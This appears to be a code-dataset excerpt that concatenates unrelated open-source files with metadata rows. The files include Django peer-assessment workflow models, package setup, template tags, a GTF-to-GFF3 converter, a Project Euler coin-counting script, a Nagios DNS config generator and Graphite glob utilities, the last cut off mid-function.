from openassessment.assessment.errors import PeerAssessmentWorkflowError, PeerAssessmentInternalError
import logging
logger = logging.getLogger("openassessment.assessment.models")
class AssessmentFeedbackOption(models.Model):
"""
Option a student can select to provide feedback on the feedback they received.
`AssessmentFeedback` stands in a one-to-many relationship with `AssessmentFeedbackOption`s:
a student can select zero or more `AssessmentFeedbackOption`s when providing feedback.
Over time, we may decide to add, delete, or reword assessment feedback options.
To preserve data integrity, we will always get-or-create `AssessmentFeedbackOption`s
based on the option text.
"""
text = models.CharField(max_length=255, unique=True)
class Meta:
app_label = "assessment"
def __unicode__(self):
return u'"{}"'.format(self.text)
class AssessmentFeedback(models.Model):
"""
Feedback on feedback. When students receive their grades, they
can provide feedback on how they were assessed, to be reviewed by course staff.
This consists of free-form written feedback
("Please provide any thoughts or comments on the feedback you received from your peers")
as well as zero or more feedback options
("Please select the statements below that reflect what you think of this peer grading experience")
"""
MAXSIZE = 1024 * 100 # 100KB
submission_uuid = models.CharField(max_length=128, unique=True, db_index=True)
assessments = models.ManyToManyField(Assessment, related_name='assessment_feedback', default=None)
feedback_text = models.TextField(max_length=10000, default="")
options = models.ManyToManyField(AssessmentFeedbackOption, related_name='assessment_feedback', default=None)
class Meta:
app_label = "assessment"
def add_options(self, selected_options):
"""
Select feedback options for this assessment.
Students can select zero or more options.
Note: you *must* save the model before calling this method.
Args:
            selected_options (list of unicode): List of options that the user selected.
Raises:
DatabaseError
"""
# First, retrieve options that already exist
options = list(AssessmentFeedbackOption.objects.filter(text__in=selected_options))
# If there are additional options that do not yet exist, create them
new_options = [text for text in selected_options if text not in [opt.text for opt in options]]
for new_option_text in new_options:
options.append(AssessmentFeedbackOption.objects.create(text=new_option_text))
# Add all options to the feedback model
# Note that we've already saved each of the AssessmentFeedbackOption models, so they have primary keys
# (required for adding to a many-to-many relationship)
self.options.add(*options) # pylint:disable=E1101
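        # Illustrative usage (not part of the model): once ``feedback.save()`` has
        # been called, ``feedback.add_options([u"These assessments were useful."])``
        # reuses any AssessmentFeedbackOption whose text already matches and
        # creates the rest before attaching them all to this feedback.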
class PeerWorkflow(models.Model):
"""Internal Model for tracking Peer Assessment Workflow
This model can be used to determine the following information required
throughout the Peer Assessment Workflow:
1) Get next submission that requires assessment.
2) Does a submission have enough assessments?
3) Has a student completed enough assessments?
4) Does a student already have a submission open for assessment?
5) Close open assessments when completed.
6) Should 'over grading' be allowed for a submission?
The student item is the author of the submission. Peer Workflow Items are
created for each assessment made by this student.
"""
# Amount of time before a lease on a submission expires
TIME_LIMIT = timedelta(hours=8)
student_id = models.CharField(max_length=40, db_index=True)
item_id = models.CharField(max_length=128, db_index=True)
course_id = models.CharField(max_length=255, db_index=True)
submission_uuid = models.CharField(max_length=128, db_index=True, unique=True)
created_at = models.DateTimeField(default=now, db_index=True)
completed_at = models.DateTimeField(null=True, db_index=True)
grading_completed_at = models.DateTimeField(null=True, db_index=True)
cancelled_at = models.DateTimeField(null=True, db_index=True)
class Meta:
ordering = ["created_at", "id"]
app_label = "assessment"
@property
def is_cancelled(self):
"""
Check if workflow is cancelled.
Returns:
True/False
"""
return bool(self.cancelled_at)
@classmethod
def get_by_submission_uuid(cls, submission_uuid):
"""
Retrieve the Peer Workflow associated with the given submission UUID.
Args:
submission_uuid (str): The string representation of the UUID belonging
to the associated Peer Workflow.
Returns:
workflow (PeerWorkflow): The most recent peer workflow associated with
this submission UUID.
Raises:
PeerAssessmentWorkflowError: Thrown when no workflow can be found for
the associated submission UUID. This should always exist before a
                student is allowed to request submissions for peer assessment.
Examples:
>>> PeerWorkflow.get_workflow_by_submission_uuid("abc123")
{
'student_id': u'Bob',
'item_id': u'type_one',
'course_id': u'course_1',
'submission_uuid': u'1',
'created_at': datetime.datetime(2014, 1, 29, 17, 14, 52, 668850, tzinfo=<UTC>)
}
"""
try:
return cls.objects.get(submission_uuid=submission_uuid)
except cls.DoesNotExist:
return None
except DatabaseError:
error_message = (
u"Error finding workflow for submission UUID {}. Workflow must be "
u"created for submission before beginning peer assessment."
).format(submission_uuid)
logger.exception(error_message)
raise PeerAssessmentWorkflowError(error_message)
@classmethod
def create_item(cls, scorer_workflow, submission_uuid):
"""
Create a new peer workflow for a student item and submission.
Args:
scorer_workflow (PeerWorkflow): The peer workflow associated with the scorer.
submission_uuid (str): The submission associated with this workflow.
Raises:
PeerAssessmentInternalError: Raised when there is an internal error
creating the Workflow.
"""
peer_workflow = cls.get_by_submission_uuid(submission_uuid)
try:
workflow_items = PeerWorkflowItem.objects.filter(
scorer=scorer_workflow,
author=peer_workflow,
submission_uuid=submission_uuid
)
if len(workflow_items) > 0:
item = workflow_items[0]
else:
item = PeerWorkflowItem.objects.create(
scorer=scorer_workflow,
author=peer_workflow,
submission_uuid=submission_uuid
)
item.started_at = now()
item.save()
return item
except DatabaseError:
error_message = (
u"An internal error occurred while creating a new peer workflow "
u"item for workflow {}"
).format(scorer_workflow)
logger.exception(error_message)
raise PeerAssessmentInternalError(error_message)
def find_active_assessments(self):
"""Given a student item, return an active assessment if one is found.
Before retrieving a new submission for a peer assessor, check to see if that
assessor already has a submission out for assessment. If an unfinished
assessment is found that has not expired or has not been cancelled,
return the associated submission.
TODO: If a user begins an assessment, then resubmits, this will never find
the unfinished assessment. Is this OK?
Args:
workflow (PeerWorkflow): See if there is an associated active assessment
for this PeerWorkflow.
Returns:
(PeerWorkflowItem) The PeerWorkflowItem for the submission that the
student has open for active assessment.
"""
oldest_acceptable = now() - self.TIME_LIMIT
items = list(self.graded.all().select_related('author').order_by("-started_at", "-id"))
valid_open_items = []
completed_sub_uuids = []
# First, remove all completed items.
for item in items:
if item.assessment is not None or item.author.is_cancelled:
completed_sub_uuids.append(item.submission_uuid)
else:
valid_open_items.append(item)
# Remove any open items which have a submission which has been completed.
for item in valid_open_items:
if (item.started_at < oldest_acceptable or
item.submission_uuid in completed_sub_uuids):
valid_open_items.remove(item)
return valid_open_items[0] if valid_open_items else None
def get_submission_for_review(self, graded_by):
"""
Find a submission for peer assessment. This function will find the next
submission that requires assessment, excluding any submission that has been
completely graded, or is actively being reviewed by other students.
Args:
            graded_by (int): The number of assessments a submission must receive
                before it is considered fully graded.
Returns:
submission_uuid (str): The submission_uuid for the submission to review.
Raises:
PeerAssessmentInternalError: Raised when there is an error retrieving
the workflows or workflow items for this request.
"""
timeout = (now() - self.TIME_LIMIT).strftime("%Y-%m-%d %H:%M:%S")
        # The following query behaves as the Peer Assessment Queue. This will
# find the next submission (via PeerWorkflow) in this course / question
# that:
# 1) Does not belong to you
# 2) Does not have enough completed assessments
# 3) Is not something you have already scored.
# 4) Does not have a combination of completed assessments or open
# assessments equal to or more than the requirement.
# 5) Has not been cancelled.
try:
peer_workflows = list(PeerWorkflow.objects.raw(
"select pw.id, pw.submission_uuid "
"from assessment_peerworkflow pw "
"where pw.item_id=%s "
"and pw.course_id=%s "
"and pw.student_id<>%s "
"and pw.grading_completed_at is NULL "
"and pw.cancelled_at is NULL "
"and pw.id not in ("
" select pwi.author_id "
" from assessment_peerworkflowitem pwi "
" where pwi.scorer_id=%s "
" and pwi.assessment_id is not NULL "
") "
"and ("
" select count(pwi.id) as c "
" from assessment_peerworkflowitem pwi "
" where pwi.author_id=pw.id "
" and (pwi.assessment_id is not NULL or pwi.started_at > %s) "
") < %s "
"order by pw.created_at, pw.id "
"limit 1; ",
[
self.item_id,
self.course_id,
self.student_id,
self.id,
timeout,
graded_by
]
))
if not peer_workflows:
return None
return peer_workflows[0].submission_uuid
except DatabaseError:
error_message = (
u"An internal error occurred while retrieving a peer submission "
u"for learner {}"
).format(self)
logger.exception(error_message)
raise PeerAssessmentInternalError(error_message)
def get_submission_for_over_grading(self):
"""
Retrieve the next submission uuid for over grading in peer assessment.
"""
        # The following query behaves as the Peer Assessment Over Grading Queue. This
# will find a random submission (via PeerWorkflow) in this course / question
# that:
# 1) Does not belong to you
# 2) Is not something you have already scored
# 3) Has not been cancelled.
try:
query = list(PeerWorkflow.objects.raw(
"select pw.id, pw.submission_uuid "
"from assessment_peerworkflow pw "
"where course_id=%s "
"and item_id=%s "
"and student_id<>%s "
"and pw.cancelled_at is NULL "
"and pw.id not in ( "
"select pwi.author_id "
"from assessment_peerworkflowitem pwi "
"where pwi.scorer_id=%s"
"); ",
[self.course_id, self.item_id, self.student_id, self.id]
))
workflow_count = len(query)
if workflow_count < 1:
return None
random_int = random.randint(0, workflow_count - 1)
random_workflow = query[random_int]
return random_workflow.submission_uuid
except DatabaseError:
error_message = (
u"An internal error occurred while retrieving a peer submission "
u"for learner {}"
).format(self)
logger.exception(error_message)
raise PeerAssessmentInternalError(error_message)
def close_active_assessment(self, submission_uuid, assessment, num_required_grades):
"""
Updates a workflow item on the student's workflow with the associated
assessment. When a workflow item has an assessment, it is considered
finished.
Args:
submission_uuid (str): The submission the scorer is grading.
assessment (PeerAssessment): The associate assessment for this action.
            num_required_grades (int): The required number of grades the peer workflow
requires to be considered complete.
Returns:
None
"""
try:
item_query = self.graded.filter(
submission_uuid=submission_uuid
).order_by("-started_at", "-id") # pylint:disable=E1101
items = list(item_query[:1])
if not items:
msg = (
u"No open assessment was found for learner {} while assessing "
u"submission UUID {}."
).format(self.student_id, submission_uuid)
raise PeerAssessmentWorkflowError(msg)
item = items[0]
item.assessment = assessment
item.save()
if (
not item.author.grading_completed_at and
item.author.graded_by.filter(assessment__isnull=False).count() >= num_required_grades
):
item.author.grading_completed_at = now()
item.author.save()
except (DatabaseError, PeerWorkflowItem.DoesNotExist):
error_message = (
u"An internal error occurred while retrieving a workflow item for "
u"learner {}. Workflow Items are created when submissions are "
u"pulled for assessment."
).format(self.student_id)
logger.exception(error_message)
raise PeerAssessmentWorkflowError(error_message)
def num_peers_graded(self):
"""
Returns the number of peers the student owning the workflow has graded.
Returns:
integer
"""
return self.graded.filter(assessment__isnull=False).count() # pylint:disable=E1101
def __repr__(self):
return (
"PeerWorkflow(student_id={0.student_id}, item_id={0.item_id}, "
"course_id={0.course_id}, submission_uuid={0.submission_uuid}"
"created_at={0.created_at}, completed_at={0.completed_at})"
).format(self)
def __unicode__(self):
return repr(self)
class PeerWorkflowItem(models.Model):
"""Represents an assessment associated with a particular workflow
Created every time a submission is requested for peer assessment. The
associated workflow represents the scorer of the given submission, and the
assessment represents the completed assessment for this work item.
"""
scorer = models.ForeignKey(PeerWorkflow, related_name='graded')
author = models.ForeignKey(PeerWorkflow, related_name='graded_by')
submission_uuid = models.CharField(max_length=128, db_index=True)
started_at = models.DateTimeField(default=now, db_index=True)
assessment = models.ForeignKey(Assessment, null=True)
# This WorkflowItem was used to determine the final score for the Workflow.
scored = models.BooleanField(default=False)
@classmethod
def get_scored_assessments(cls, submission_uuid):
"""
Return all scored assessments for a given submission.
Args:
submission_uuid (str): The UUID of the submission.
Returns:
QuerySet of Assessment objects.
"""
return Assessment.objects.filter(
pk__in=[
item.assessment.pk for item in PeerWorkflowItem.objects.filter(
submission_uuid=submission_uuid, scored=True
)
]
)
class Meta:
ordering = ["started_at", "id"]
app_label = "assessment"
def __repr__(self):
return (
"PeerWorkflowItem(scorer={0.scorer}, author={0.author}, "
"submission_uuid={0.submission_uuid}, "
"started_at={0.started_at}, assessment={0.assessment}, "
"scored={0.scored})"
).format(self)
def __unicode__(self):
return repr(self)
|
agpl-3.0
| 7,839,245,104,259,075,000 | 37.778468 | 112 | 0.609557 | false | 4.553854 | false | false | false |
yoshrote/valid_model
|
setup.py
|
1
|
1048
|
from setuptools import setup, find_packages
setup(name='valid_model',
version='0.4.0',
description="Generic data modeling and validation",
long_description="""\
""",
classifiers=[
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
],
keywords='',
author='Joshua Forman',
author_email='[email protected]',
url='https://github.com/yoshrote/valid_model',
license='MIT',
packages=find_packages(exclude=['ez_setup', 'examples', 'tests']),
include_package_data=True,
zip_safe=False,
install_requires=[
'six'
],
entry_points="""
# -*- Entry points: -*-
""",
)
|
mit
| -5,580,786,748,296,095,000 | 31.75 | 72 | 0.542939 | false | 4.295082 | false | true | false |
saydulk/django-wysiwyg
|
django_wysiwyg/templatetags/wysiwyg.py
|
1
|
2413
|
from django import template
from django.conf import settings
from django.template.loader import render_to_string
try:
from urlparse import urljoin
except ImportError:
from urllib.parse import urljoin
register = template.Library()
def get_settings():
"""Utility function to retrieve settings.py values with defaults"""
flavor = getattr(settings, "DJANGO_WYSIWYG_FLAVOR", "yui")
return {
"DJANGO_WYSIWYG_MEDIA_URL": getattr(settings, "DJANGO_WYSIWYG_MEDIA_URL", urljoin(settings.STATIC_URL, flavor) + '/'),
"DJANGO_WYSIWYG_FLAVOR": flavor,
}
@register.simple_tag
def wysiwyg_setup(protocol="http"):
"""
Create the <style> and <script> tags needed to initialize the rich text editor.
Create a local django_wysiwyg/includes.html template if you don't want to use Yahoo's CDN
"""
ctx = {
"protocol": protocol,
}
ctx.update(get_settings())
return render_to_string(
"django_wysiwyg/%s/includes.html" % ctx['DJANGO_WYSIWYG_FLAVOR'],
ctx
)
@register.simple_tag
def wysiwyg_editor(field_id, editor_name=None, config=None):
"""
Turn the textarea #field_id into a rich editor. If you do not specify the
JavaScript name of the editor, it will be derived from the field_id.
If you don't specify the editor_name then you'll have a JavaScript object
named "<field_id>_editor" in the global namespace. We give you control of
    this in case you have a complex JS environment.
"""
if not editor_name:
editor_name = "%s_editor" % field_id
ctx = {
'field_id': field_id,
'editor_name': editor_name,
'config': config
}
ctx.update(get_settings())
return render_to_string(
"django_wysiwyg/%s/editor_instance.html" % ctx['DJANGO_WYSIWYG_FLAVOR'],
ctx
)
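# Typical template usage (illustrative only; the textarea id is an assumption):
#
#   {% load wysiwyg %}
#   {% wysiwyg_setup %}
#   <textarea id="id_body"></textarea>
#   {% wysiwyg_editor "id_body" %}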
@register.simple_tag
def wysiwyg_static_url(appname, prefix, default_path):
"""
    Automatically use a prefix if a given application is installed.
    For example, if django-ckeditor is installed, use its STATIC_URL/ckeditor folder to find the CKEditor distribution.
    When the application is not available, fall back to the default path.
This is a function for the internal templates of *django-wysiwyg*.
"""
if appname in settings.INSTALLED_APPS:
return urljoin(settings.STATIC_URL, prefix)
else:
return default_path
|
mit
| -7,762,174,823,449,520,000 | 28.790123 | 126 | 0.675508 | false | 3.569527 | false | false | false |
nextgenusfs/funannotate
|
funannotate/utilities/stringtie2gff3.py
|
1
|
3977
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import argparse
import funannotate.library as lib
def dict2gff3(input):
    '''
    Function to convert a funannotate gene dictionary to GFF3 output.
    '''
    from collections import OrderedDict
def _sortDict(d):
return (d[1]['contig'], d[1]['location'][0])
# sort the annotations by contig and start location
sGenes = sorted(iter(input.items()), key=_sortDict)
sortedGenes = OrderedDict(sGenes)
# then loop through and write GFF3 format
sys.stdout.write("##gff-version 3\n")
for k, v in list(sortedGenes.items()):
sys.stdout.write("{:}\t{:}\tgene\t{:}\t{:}\t.\t{:}\t.\tID={:};\n".format(
v['contig'], v['source'], v['location'][0], v['location'][1], v['strand'], k))
for i in range(0, len(v['ids'])):
# build extra annotations for each transcript if applicable
# now write mRNA feature
sys.stdout.write("{:}\t{:}\t{:}\t{:}\t{:}\t.\t{:}\t.\tID={:};Parent={:};TPM={:}\n".format(
v['contig'], v['source'], v['type'], v['location'][0], v['location'][1], v['strand'], v['ids'][i], k, v['tpm'][i]))
if v['type'] == 'mRNA':
if '5UTR' in v:
# if 5'UTR then write those first
num_5utrs = len(v['5UTR'][i])
if num_5utrs > 0:
for z in range(0, num_5utrs):
u_num = z + 1
sys.stdout.write("{:}\t{:}\tfive_prime_UTR\t{:}\t{:}\t.\t{:}\t.\tID={:}.utr5p{:};Parent={:};\n".format(
v['contig'], v['source'], v['5UTR'][i][z][0], v['5UTR'][i][z][1], v['strand'], v['ids'][i], u_num, v['ids'][i]))
# write the exons
num_exons = len(v['mRNA'][i])
for x in range(0, num_exons):
ex_num = x + 1
sys.stdout.write("{:}\t{:}\texon\t{:}\t{:}\t.\t{:}\t.\tID={:}.exon{:};Parent={:};\n".format(
v['contig'], v['source'], v['mRNA'][i][x][0], v['mRNA'][i][x][1], v['strand'], v['ids'][i], ex_num, v['ids'][i]))
# if 3'UTR then write
if '3UTR' in v:
num_3utrs = len(v['3UTR'][i])
if num_3utrs > 0:
for z in range(0, num_3utrs):
u_num = z + 1
sys.stdout.write("{:}\t{:}\tthree_prime_UTR\t{:}\t{:}\t.\t{:}\t.\tID={:}.utr3p{:};Parent={:};\n".format(
v['contig'], v['source'], v['3UTR'][i][z][0], v['3UTR'][i][z][1], v['strand'], v['ids'][i], u_num, v['ids'][i]))
if v['type'] == 'mRNA':
num_cds = len(v['CDS'][i])
# GFF3 phase is 1 less than flat file
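                # e.g. a CDS of length 100 starting in phase 0 leaves the next
                # CDS in phase (0 - 100) % 3 == 2 (Python's % is non-negative here)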
current_phase = v['codon_start'][i] - 1
for y in range(0, num_cds):
sys.stdout.write("{:}\t{:}\tCDS\t{:}\t{:}\t.\t{:}\t{:}\tID={:}.cds;Parent={:};\n".format(
v['contig'], v['source'], v['CDS'][i][y][0], v['CDS'][i][y][1], v['strand'], current_phase, v['ids'][i], v['ids'][i]))
current_phase = (
current_phase - (int(v['CDS'][i][y][1]) - int(v['CDS'][i][y][0]) + 1)) % 3
if current_phase == 3:
current_phase = 0
def main(args):
# setup menu with argparse
parser = argparse.ArgumentParser(prog='stringtie2gff.py',
description='''Script to convert StringTie GTF file to GFF3.''',
epilog="""Written by Jon Palmer (2018) [email protected]""")
parser.add_argument('-i', '--input', required=True,
help='StringTie GTF file')
args = parser.parse_args(args)
Genes = lib.gtf2dict(args.input)
dict2gff3(Genes)
if __name__ == "__main__":
main(sys.argv[1:])
|
bsd-2-clause
| -5,736,459,926,717,889,000 | 49.341772 | 144 | 0.451848 | false | 3.25184 | false | false | false |
brianloveswords/webpagemaker
|
webpagemaker/api/migrations/0004_lowercase_short_url_ids.py
|
1
|
1316
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
NUMERALS = "3fldc4mzjyqr7bkug5vh0a68xpon9stew12i"
def rebase(num, numerals=NUMERALS):
base = len(numerals)
left_digits = num // base
if left_digits == 0:
return numerals[num % base]
else:
return rebase(left_digits, numerals) + numerals[num % base]
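# Illustrative behaviour of rebase() with the default alphabet (not part of the
# original migration): rebase(0) == '3', rebase(1) == 'f', and rebase(36) == 'f3',
# i.e. ids are encoded in base len(NUMERALS) == 36.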
class Migration(DataMigration):
def forwards(self, orm):
"Write your forwards methods here."
for page in orm.Page.objects.all():
page.short_url_id = rebase(page.id)
page.save()
def backwards(self, orm):
"Write your backwards methods here."
raise RuntimeError("Cannot go back.")
models = {
'api.page': {
'Meta': {'object_name': 'Page'},
'html': ('django.db.models.fields.TextField', [], {'max_length': '10000'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'original_url': ('django.db.models.fields.URLField', [], {'default': "''", 'max_length': '200', 'blank': 'True'}),
'short_url_id': ('django.db.models.fields.CharField', [], {'max_length': '10', 'blank': 'True'})
}
}
complete_apps = ['api']
symmetrical = True
|
mpl-2.0
| 162,472,665,847,516,580 | 31.9 | 126 | 0.587386 | false | 3.454068 | false | false | false |
EndPointCorp/lg_ros_nodes
|
lg_media/scripts/browser_player.py
|
1
|
1133
|
#!/usr/bin/env python3
import rospy
from lg_msg_defs.msg import AdhocMedias
from lg_media import DirectorMediaBridge
from interactivespaces_msgs.msg import GenericMessage
from lg_common.helpers import handle_initial_state
from lg_common.helpers import run_with_influx_exception_handler
DEFAULT_VIEWPORT = 'center'
MEDIA_TYPE = 'browser_video'
VIDEOSYNC_URL = 'http://lg-head/lg_sv/webapps/videosync'
NODE_NAME = 'lg_media_service_browser_player'
def main():
rospy.init_node(NODE_NAME, anonymous=True)
viewport_name = rospy.get_param('~viewport', DEFAULT_VIEWPORT)
topic_name = '/media_service/browser/%s' % viewport_name
adhoc_media_publisher = rospy.Publisher(topic_name, AdhocMedias,
queue_size=3)
director_bridge = DirectorMediaBridge(adhoc_media_publisher, viewport_name, MEDIA_TYPE)
rospy.Subscriber('/director/scene', GenericMessage,
director_bridge.translate_director)
handle_initial_state(director_bridge.translate_director)
rospy.spin()
if __name__ == '__main__':
run_with_influx_exception_handler(main, NODE_NAME)
|
apache-2.0
| 6,909,703,112,144,728,000 | 34.40625 | 91 | 0.713151 | false | 3.392216 | false | false | false |
paulmcquad/projecteuler
|
0-100/problem31.py
|
1
|
1448
|
#http://users.softlab.ntua.gr/~ttsiod/euler31.html
#!/usr/bin/env python
# the 8 coins correspond to 8 columns
coins = [1, 2, 5, 10, 20, 50, 100, 200]
TARGET=200
matrix = {}
for y in xrange(0, TARGET+1):
# There is only one way to form a target sum N
# via 1-cent coins: use N 1-cents!
matrix[y, 0] = 1 # equivalent to matrix[(y,0)]=1
for y in xrange(0, TARGET+1):
print y, ":", 1,
for x in xrange(1, len(coins)):
matrix[y, x] = 0
# Is the target big enough to accomodate coins[x]?
if y>=coins[x]:
# If yes, then the number of ways to form
# the target sum are obtained via:
#
# (a) the number of ways to form this target
# using ONLY coins less than column x
# i.e. matrix[y][x-1]
matrix[y, x] += matrix[y, x-1]
# plus
# (b) the number of ways to form this target
# when USING the coin of column x
# which means for a remainder of y-coins[x]
# i.e. matrix[y-coins[x]][x]
matrix[y, x] += matrix[y-coins[x], x]
else:
# if the target is not big enough to allow
# usage of the coin in column x,
# then just copy the number of ways from the
# column to the left (i.e. with smaller coins)
matrix[y, x] = matrix[y, x-1]
print matrix[y, x],
print
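# The number of ways to make the 200p target is the final cell,
# matrix[TARGET, len(coins) - 1] (73682 for these denominations).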
|
gpl-3.0
| -9,069,959,849,210,606,000 | 31.909091 | 59 | 0.529006 | false | 3.290909 | false | false | false |
savoirfairelinux/quebec-monitoring
|
scripts/dns.py
|
1
|
2091
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
DNS = {
# Cogeco Cable (Trois-rivieres)
'cogeco.ca': ['205.151.69.200','205.151.68.200'],
# Videotron.CA
'videotron.ca': ['205.151.222.250', '205.151.222.251'],
# Colbanet
'colba.net': ['216.252.64.75', '216.252.64.76'],
}
template_host = (
"""
define host {
use generic-host
host_name %(host)s
address %(host)s
alias %(host)s
check_command check_dummy!0!OK
}
""")
template_service = (
"""
define service {
use generic-service
host_name %(host)s
check_command check_dig_service!%(ip)s!www.gouv.qc.ca
display_name %(host)s (%(ip)s)
service_description %(ip)s
servicegroups dns
labels order_%(order)d
}
""")
business_rule = (
"""
define host {
use generic-host
host_name dns
alias dns
check_command check_dummy!0!OK
}
define service {
use template_bprule
host_name dns
service_description dns
display_name DNS
notes Principaux serveurs DNS.
check_command bp_rule!%(all_dns)s
business_rule_output_template $(x)$
servicegroups main
icon_image fa-gears
}
""")
def main():
all_dns = []
order = 1
for host, ips in DNS.iteritems():
print template_host % {'host': host}
for ip in ips:
print template_service % {'host': host, 'ip': ip, 'order': order}
all_dns.append('%(host)s,%(ip)s' % {'host': host, 'ip': ip})
order += 1
print business_rule % {'all_dns': '&'.join(all_dns)}
if __name__ == '__main__':
main()
|
agpl-3.0
| -6,103,445,619,368,963,000 | 27.256757 | 77 | 0.432329 | false | 3.901119 | false | false | false |
dpanth3r/biggraphite
|
biggraphite/glob_utils.py
|
1
|
15872
|
#!/usr/bin/env python
# Copyright 2016 Criteo
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Globbing utility module."""
from enum import Enum
import itertools
import re
# http://graphite.readthedocs.io/en/latest/render_api.html#paths-and-wildcards
_GRAPHITE_GLOB_RE = re.compile(r"^[^*?{}\[\]]+$")
def _is_graphite_glob(metric_component):
"""Return whether a metric component is a Graphite glob."""
return _GRAPHITE_GLOB_RE.match(metric_component) is None
def _is_valid_glob(glob):
"""Check whether a glob pattern is valid.
It does so by making sure it has no dots (path separator) inside groups,
    and that the grouping braces are not mismatched. This helps avoid doing useless
(or worse, wrong) work on queries.
Args:
glob: Graphite glob pattern.
Returns:
True if the glob is valid.
"""
depth = 0
for c in glob:
if c == '{':
depth += 1
elif c == '}':
depth -= 1
if depth < 0:
# Mismatched braces
return False
elif c == '.':
if depth > 0:
# Component separator in the middle of a group
return False
# We should have exited all groups at the end
return depth == 0
class TokenType(Enum):
"""Represents atomic types used to tokenize Graphite globbing patterns."""
PATH_SEPARATOR = 0
LITERAL = 1
WILD_CHAR = 2
WILD_SEQUENCE = 3
WILD_PATH = 4
CHAR_SELECT_BEGIN = 5
CHAR_SELECT_NEGATED_BEGIN = 6
CHAR_SELECT_RANGE_DASH = 7
CHAR_SELECT_END = 8
EXPR_SELECT_BEGIN = 9
EXPR_SELECT_SEPARATOR = 10
EXPR_SELECT_END = 11
def tokenize(glob):
"""Convert a glob expression to a stream of tokens.
Tokens have the form (type: TokenType, data: String).
Args:
glob: Graphite glob pattern.
Returns:
Iterator on a token stream.
"""
SPECIAL_CHARS = '.?*[-]{,}'
is_escaped = False
is_char_select = False
tmp = ""
token = None
i = -1
while i+1 < len(glob):
i += 1
c = glob[i]
# Literal handling
if is_escaped:
tmp += c
is_escaped = False
continue
elif c == '\\':
is_escaped = True
continue
elif c not in SPECIAL_CHARS or (c == '-' and not is_char_select):
if token and token != TokenType.LITERAL:
yield token, None
token, tmp = TokenType.LITERAL, ""
token = TokenType.LITERAL
tmp += c
continue
elif token:
yield token, tmp
token, tmp = None, ""
# Special chars handling
if c == '.':
yield TokenType.PATH_SEPARATOR, ""
elif c == '?':
yield TokenType.WILD_CHAR, ""
elif c == '*':
# Look-ahead for wild path (globstar)
if i+1 < len(glob) and glob[i+1] == '*':
i += 1
yield TokenType.WILD_PATH, ""
else:
yield TokenType.WILD_SEQUENCE, ""
elif c == '[':
is_char_select = True
# Look-ahead for negated selector (not in)
if i+1 < len(glob) and glob[i+1] == '!':
i += 1
yield TokenType.CHAR_SELECT_NEGATED_BEGIN, ""
else:
yield TokenType.CHAR_SELECT_BEGIN, ""
elif c == '-':
yield TokenType.CHAR_SELECT_RANGE_DASH, ""
elif c == ']':
is_char_select = False
yield TokenType.CHAR_SELECT_END, ""
elif c == '{':
yield TokenType.EXPR_SELECT_BEGIN, ""
elif c == ',':
yield TokenType.EXPR_SELECT_SEPARATOR, ""
elif c == '}':
yield TokenType.EXPR_SELECT_END, ""
else:
raise Exception("Unexpected character '%s'" % c)
# Do not forget trailing token, if any
if token:
yield token, tmp
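# Illustrative token stream (not part of the module):
#   list(tokenize("a.*")) == [(TokenType.LITERAL, 'a'),
#                             (TokenType.PATH_SEPARATOR, ''),
#                             (TokenType.WILD_SEQUENCE, '')]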
def _glob_to_regex(glob):
"""Convert a Graphite globbing pattern into a regular expression.
This function does not check for glob validity, if you want usable regexes
then you must check _is_valid_glob() first.
Uses _tokenize() to obtain a token stream, then does simple substitution
from token type and data to equivalent regular expression.
It handles * as being anything except a dot.
It returns a regex that only matches whole strings (i.e. ^regex$).
Args:
glob: Valid Graphite glob pattern.
Returns:
Regex corresponding to the provided glob.
"""
ans = ""
for token, data in tokenize(glob):
if token == TokenType.PATH_SEPARATOR:
ans += re.escape('.')
elif token == TokenType.LITERAL:
ans += re.escape(data)
elif token == TokenType.WILD_CHAR:
ans += "."
elif token == TokenType.WILD_SEQUENCE:
ans += "[^.]*"
elif token == TokenType.WILD_PATH:
ans += ".*"
elif token == TokenType.CHAR_SELECT_BEGIN:
ans += "["
elif token == TokenType.CHAR_SELECT_NEGATED_BEGIN:
ans += "[^"
elif token == TokenType.CHAR_SELECT_RANGE_DASH:
ans += "-"
elif token == TokenType.CHAR_SELECT_END:
ans += "]"
elif token == TokenType.EXPR_SELECT_BEGIN:
ans += "("
elif token == TokenType.EXPR_SELECT_SEPARATOR:
ans += "|"
elif token == TokenType.EXPR_SELECT_END:
ans += ")"
else:
raise Exception("Unexpected token type '%s' with data '%s'" % (token, data))
return '^' + ans + '$'
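# For instance (illustrative, not part of the module):
#   _glob_to_regex("a.b*.{c,d}") produces the pattern ^a\.b[^.]*\.(c|d)$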
def glob(metric_names, glob_pattern):
"""Pre-filter metric names according to a glob expression.
Uses the dot-count and the litteral components of the glob to filter
guaranteed non-matching values out, but may still require post-filtering.
Args:
metric_names: List of metric names to be filtered.
glob_pattern: Glob pattern.
Returns:
List of metric names that may be matched by the provided glob.
"""
glob_components = glob_pattern.split(".")
globstar = None
prefix_literals = []
suffix_literals = []
for (index, component) in enumerate(glob_components):
if component == "**":
globstar = index
        elif globstar is not None:
# Indexed relative to the end because globstar length is arbitrary
suffix_literals.append((len(glob_components) - index, component))
elif not _is_graphite_glob(component):
prefix_literals.append((index, component))
def maybe_matched_prefilter(metric):
metric_components = metric.split(".")
        if globstar is not None:
if len(metric_components) < len(glob_components):
return False
elif len(metric_components) != len(glob_components):
return False
for (index, value) in itertools.chain(suffix_literals, prefix_literals):
if metric_components[index] != value:
return False
return True
return filter(maybe_matched_prefilter, metric_names)
def graphite_glob(accessor, graphite_glob, metrics=True, directories=True):
"""Get metrics and directories matching a Graphite glob.
Args:
accessor: BigGraphite accessor
graphite_glob: Graphite glob expression
metrics: True if metrics should be fetched
directories: True if directories should be fetched
Returns:
A tuple:
